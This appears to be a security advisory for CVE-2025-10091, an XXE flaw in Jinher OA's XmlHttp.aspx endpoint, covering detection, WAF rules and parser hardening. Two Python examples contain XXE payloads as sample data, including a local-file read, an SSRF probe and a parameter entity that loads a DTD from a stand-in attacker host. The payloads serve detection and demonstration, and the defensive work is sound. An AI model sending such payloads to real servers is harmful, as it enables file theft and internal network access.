CVE-2025-10091 Overview
A vulnerability has been identified in Jinher OA versions up to 1.2 that allows XML External Entity (XXE) injection through the XML Handler component. The vulnerability exists in the file /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx/?Type=add, where XML supplied in the request is parsed with external entity resolution left enabled, so an attacker can declare entities that point at local files or network resources and have the server resolve them. Remote exploitation is possible, and exploit details have been publicly disclosed.
Critical Impact
This XXE vulnerability could allow attackers to read files the web application process can access, make the server issue requests to internal or external hosts (server-side request forgery, SSRF), or cause denial of service through entity expansion or by pointing entities at slow or non-existent resources. The public availability of exploit information increases the risk of active exploitation.
Affected Products
- Jinher OA up to version 1.2
- XML Handler component (XmlHttp.aspx)
- Project Management module (Jhsoft.Web.projectmanage)
Discovery Timeline
- 2025-09-08 - CVE-2025-10091 published to NVD
- 2025-10-09 - Last updated in NVD database
Technical Details for CVE-2025-10091
Vulnerability Analysis
This vulnerability is classified under CWE-611 (Improper Restriction of XML External Entity Reference) and CWE-610 (Externally Controlled Reference to a Resource in Another Sphere). The XXE vulnerability occurs when the application processes XML input without properly restricting external entity references. This allows an attacker to craft malicious XML payloads that can reference internal or external resources, potentially leading to information disclosure, server-side request forgery, or denial of service.
The vulnerable endpoint /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx, invoked with Type=add, parses the request's XML with no restriction on DTD processing or entity resolution. When the parser encounters a reference to an external entity declared in the document's DOCTYPE, it fetches and inlines the referenced resource, which an attacker uses to read server files or to reach internal network services.
Root Cause
The root cause of this vulnerability is the configuration of the XML parser used by the Jinher OA application: external entity processing is not disabled, so entities defined in an attacker-supplied DOCTYPE are resolved, including local file paths and network locations, during parsing. The sources cited on this page do not name the .NET API involved; in ASP.NET code the usual culprits are XmlDocument.Load or XmlTextReader used with a non-null XmlResolver, or an XmlReader created with DtdProcessing set to Parse.
Attack Vector
The attack is network-accessible and, per the CVE data, needs no user interaction; the sources cited here do not settle whether a valid Jinher OA session is required, so until that is confirmed treat the endpoint as reachable by anyone who can reach the web tier. An attacker sends an HTTP request carrying a crafted XML body to the XmlHttp.aspx endpoint with Type=add. The body declares external entities whose system identifiers point at sensitive files (such as configuration files containing credentials) or at internal network services.
Exploitation typically involves an XML document whose DOCTYPE declares an external entity with a SYSTEM identifier (file://, http:// or similar) and then references that entity in an element the application stores or echoes. When the server parses the document, the parser resolves the entity and the referenced content lands in the response, in a stored record, or in an error message, which exposes it to the attacker. When nothing is reflected, the usual fallback is a parameter entity that loads an attacker-hosted DTD and makes the server send the data out in a follow-up request.
For detailed technical analysis and proof-of-concept information, refer to the GitHub CVE Issue Discussion and VulDB Entry #323046.
Detection Methods for CVE-2025-10091
Indicators of Compromise
- Suspicious HTTP requests to /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx whose bodies contain a DOCTYPE declaration, in particular <!ENTITY declarations with SYSTEM or PUBLIC identifiers (file://, http:// and similar schemes)
- Log entries showing XML parsing errors or failed resolution of external entities, including attempts to open unexpected local paths
- Outbound connections from the web server, typically from the IIS worker process (w3wp.exe) hosting the application, to unexpected internal or external hosts, including DNS lookups for unfamiliar domains
- Reads of web.config, connection-string files or other sensitive files by the web application process
Detection Strategies
- Implement web application firewall (WAF) rules to detect and block requests containing XXE attack patterns such as <!ENTITY or <!DOCTYPE declarations with external references; match on the decoded body (including UTF-16 encoded bodies), since keyword signatures are easily evaded by encoding tricks, and if the endpoint never legitimately needs a DTD, reject any body containing <!DOCTYPE rather than trying to enumerate attack patterns
- Monitor application logs for XML parsing exceptions or errors related to entity resolution
- Deploy intrusion detection system (IDS) signatures to identify XXE payload patterns in HTTP traffic
- Review access logs for repeated requests to the vulnerable endpoint with varying XML content
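The detection checks above, as an added example that is not part of the original page or of any Jinher product: a Python pre-filter of the kind a reverse proxy or log-review script would run, exercised against constructed request samples. It covers the patterns the list names (DOCTYPE, external entity declarations with SYSTEM or PUBLIC identifiers, parameter entities), transcodes UTF-16 bodies so an encoding switch does not hide the keywords, and treats any DTD aimed at the CVE's endpoint as blockable, which is also the input-validation workaround described under Mitigation. The request IDs, bodies, the attacker.example host and the unrelated /c6/other.aspx path are all constructed for the demo.

```python
"""Flag XXE-shaped XML in HTTP request bodies (WAF / log-review style check).

Added example; sample requests are constructed, not captured traffic.
"""
import codecs
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Endpoint from the CVE record, lower-cased because IIS paths are case-insensitive.
VULNERABLE_PATH = "/c6/jhsoft.web.projectmanage/projectmanage/xmlhttp.aspx"

# Byte regexes applied after normalisation to UTF-8. XML keywords are case-sensitive,
# but probes against lax parsers vary case, so match case-insensitively.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.I)
ENTITY_RE = re.compile(rb"<!ENTITY\b", re.I)
PARAM_ENTITY_RE = re.compile(rb"<!ENTITY\s+%", re.I)
EXTERNAL_ID_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b[^>]*?\b(?:SYSTEM|PUBLIC)\b", re.I | re.S)
URI_SCHEME_RE = re.compile(rb"""(?:SYSTEM|PUBLIC\s*["'][^"']*["'])\s*["']([a-z][a-z0-9+.\-]*):""", re.I)


def normalize_body(body: bytes) -> bytes:
    """Transcode UTF-16 bodies to UTF-8 so an encoding switch cannot hide the keywords."""
    if body.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return body.decode("utf-16", errors="replace").encode("utf-8")
    # BOM-less UTF-16: exactly one NUL in the first byte pair of an ASCII '<' or space.
    if len(body) >= 2 and (body[0] == 0) != (body[1] == 0):
        enc = "utf-16-be" if body[0] == 0 else "utf-16-le"
        try:
            return body.decode(enc).encode("utf-8")
        except UnicodeDecodeError:
            pass
    return body


@dataclass
class Finding:
    request_id: str
    path: str
    severity: str      # "high": external/parameter entity; "medium": DTD without external reference
    verdict: str       # "block" or "review"
    reasons: List[str]


def inspect_request(request_id: str, path: str, body: bytes) -> Optional[Finding]:
    data = normalize_body(body)
    reasons: List[str] = []
    if EXTERNAL_ID_RE.search(data):
        schemes = sorted({m.group(1).lower().decode("ascii") for m in URI_SCHEME_RE.finditer(data)})
        reasons.append("external entity or DTD reference (schemes: %s)" % (", ".join(schemes) or "unparsed"))
    if PARAM_ENTITY_RE.search(data):
        reasons.append("parameter entity declaration (typical of out-of-band exfiltration)")
    if not reasons and ENTITY_RE.search(data):
        reasons.append("internal entity declarations only (possible entity-expansion DoS)")
    if not reasons and DOCTYPE_RE.search(data):
        reasons.append("DOCTYPE present without entity declarations")
    if not reasons:
        return None
    severity = "high" if reasons[0].startswith(("external", "parameter")) else "medium"
    on_target = path.lower().split("?", 1)[0].rstrip("/") == VULNERABLE_PATH
    # The vulnerable endpoint has no legitimate need for a DTD: any DOCTYPE aimed at it is blocked.
    verdict = "block" if severity == "high" or on_target else "review"
    return Finding(request_id, path, severity, verdict, reasons)


def scan_requests(requests: List[Tuple[str, str, bytes]]) -> List[Finding]:
    return [f for f in (inspect_request(*r) for r in requests) if f is not None]


# Constructed samples: (request id, request path, raw body).
_TARGET = "/c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx/?Type=add"
_FILE_XXE = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">]>'
             b'<Project><Name>&xxe;</Name></Project>')
SAMPLE_REQUESTS = [
    ("r1", _TARGET, b'<?xml version="1.0"?><Project><Name>Q4 rollout</Name></Project>'),  # benign
    ("r2", _TARGET, _FILE_XXE),                                                           # local file read
    ("r3", _TARGET, b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin">]>'
                    b'<Project><Name>&xxe;</Name></Project>'),                             # SSRF
    ("r4", _TARGET, b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % dtd SYSTEM "http://attacker.example/x.dtd"> %dtd;]>'
                    b'<Project/>'),                                                        # out-of-band DTD
    ("r5", _TARGET, codecs.BOM_UTF16_LE + _FILE_XXE.decode("ascii").encode("utf-16-le")), # same as r2, UTF-16
    ("r6", _TARGET, b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
                    b'<Project><Name>&b;</Name></Project>'),                               # entity expansion
    ("r7", "/c6/other.aspx", b'<!DOCTYPE html><html><body>ok</body></html>'),             # placeholder path
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding.request_id, finding.severity, finding.verdict, "; ".join(finding.reasons))
```

The verdict split matters in practice: external or parameter entities are blocked wherever they appear, while a DOCTYPE on some other endpoint is only queued for review, so the filter can be deployed site-wide without first inventorying every XML consumer.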
Monitoring Recommendations
- Enable detailed logging on the Jinher OA application server to capture all requests to the vulnerable endpoint
- Set up alerts for anomalous outbound network connections originating from the web server
- Monitor file access patterns on the server for unauthorized reads of sensitive configuration files
- Implement network segmentation monitoring to detect potential SSRF exploitation attempts
How to Mitigate CVE-2025-10091
Immediate Actions Required
- Restrict network access to the vulnerable /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx endpoint using firewall rules or access control lists
- Implement WAF rules to block requests containing XML external entity declarations
- Review and audit other XML processing endpoints in the Jinher OA application for similar vulnerabilities
- Consider temporarily disabling the Project Management module if not critical to business operations
Patch Information
At the time of publication, no official vendor patch has been identified in the available CVE data. Organizations should monitor Jinher's official channels for security updates. For additional information, consult the VulDB Entry #323046 and VulDB Submission #644864.
Workarounds
- Configure the XML parser to disable external entity processing and DTD processing entirely
- Implement input validation to reject XML documents containing DOCTYPE declarations or external entity references
- Deploy a reverse proxy or WAF to filter malicious XML content before it reaches the application
- Apply network segmentation to limit the impact of potential SSRF attacks originating from the vulnerable server
Recommended XML parser hardening disables DTD processing, external general entities, and external parameter entities. In .NET that means creating readers from an XmlReaderSettings whose DtdProcessing is DtdProcessing.Prohibit and whose XmlResolver is null, and setting XmlResolver to null on any XmlDocument that loads untrusted input. Because these settings live in the application's own code, only the vendor can apply them; contact Jinher support for application-specific guidance, and enforce rejection of DOCTYPE-bearing requests at the web server or WAF level until an official patch is available.
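The following is an added example, not code from Jinher or from the page's sources. Jinher OA is ASP.NET and its parser code is not public, so the misconfiguration described under Root Cause and the hardening described under Workarounds are shown with Python's xml.sax/expat parser, which has the same switch: whether external general entities are resolved. It builds the Attack Vector's payload (a DOCTYPE declaring an external entity and a reference to it in the stored field), feeds it to a parser configured the vulnerable way, then to one that refuses any DTD and resolves no external entities. The temporary file, its contents and the element names are constructed for the demo.

```python
"""XXE: the misconfiguration that resolves external entities, beside the hardened parser.

Added example (not Jinher's code). Python's xml.sax/expat stands in for the ASP.NET
parser; the vulnerable setting here is feature_external_ges=True.
"""
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             feature_external_pes, property_lexical_handler)

# Attack-vector payload: DOCTYPE declares an external entity, and the entity is referenced
# inside the field the endpoint would normally store or echo back.
PAYLOAD_TEMPLATE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE Project [\n'
    '  <!ENTITY xxe SYSTEM "{uri}">\n'
    ']>\n'
    '<Project><Name>&xxe;</Name></Project>\n'
)


def build_payload(target_file: Path) -> bytes:
    """Point the entity at a local file via a file:// URI (an http:// URI would give SSRF instead)."""
    return PAYLOAD_TEMPLATE.format(uri=target_file.resolve().as_uri()).encode("utf-8")


class NameCollector(ContentHandler):
    """Gathers the text of <Name>: what the application would persist or return."""

    def __init__(self):
        super().__init__()
        self._in_name = False
        self.name = ""

    def startElement(self, tag, attrs):
        if tag == "Name":
            self._in_name = True

    def endElement(self, tag):
        if tag == "Name":
            self._in_name = False

    def characters(self, content):
        if self._in_name:
            self.name += content


class DtdRejected(Exception):
    """Raised by the hardened parser as soon as a DOCTYPE is seen."""


class RejectDtd:
    """Lexical handler: the endpoint never needs a DTD, so any DOCTYPE aborts the parse."""

    def startDTD(self, name, public_id, system_id):
        raise DtdRejected("DOCTYPE %r rejected (public=%r system=%r)" % (name, public_id, system_id))

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def parse_vulnerable(xml_bytes: bytes) -> str:
    """The misconfiguration: external general entities are fetched and inlined."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    collector = NameCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.name


def parse_hardened(xml_bytes: bytes) -> str:
    """No external general or parameter entities, and no DTD at all."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    parser.setProperty(property_lexical_handler, RejectDtd())
    collector = NameCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.name


def demo():
    """Returns (text leaked by the vulnerable parser, hardened parser refused payload, hardened result on benign input)."""
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for a configuration file holding credentials.
        secret = Path(tmp) / "web.config.sample"
        secret.write_text("connectionString=Server=db;User=sa;Password=hunter2", encoding="utf-8")
        payload = build_payload(secret)
        leaked = parse_vulnerable(payload)
        try:
            parse_hardened(payload)
            refused = False
        except DtdRejected:
            refused = True
        benign = parse_hardened(b'<?xml version="1.0"?><Project><Name>Q4 rollout</Name></Project>')
    return leaked, refused, benign


if __name__ == "__main__":
    leaked, refused, benign = demo()
    print("vulnerable parser returned:", leaked)
    print("hardened parser refused payload:", refused)
    print("hardened parser on benign input:", benign)
```

The vulnerable parser returns the file's contents in the Name field, which is exactly the data an application would then store or echo; the same resolver would open an http:// system identifier, which is the SSRF path. Rejecting the DTD outright, rather than only disabling external entities, also stops entity-expansion denial of service, since that needs internal entity declarations that live in the same DOCTYPE. The .NET counterpart is XmlReaderSettings with DtdProcessing.Prohibit and a null XmlResolver.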
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


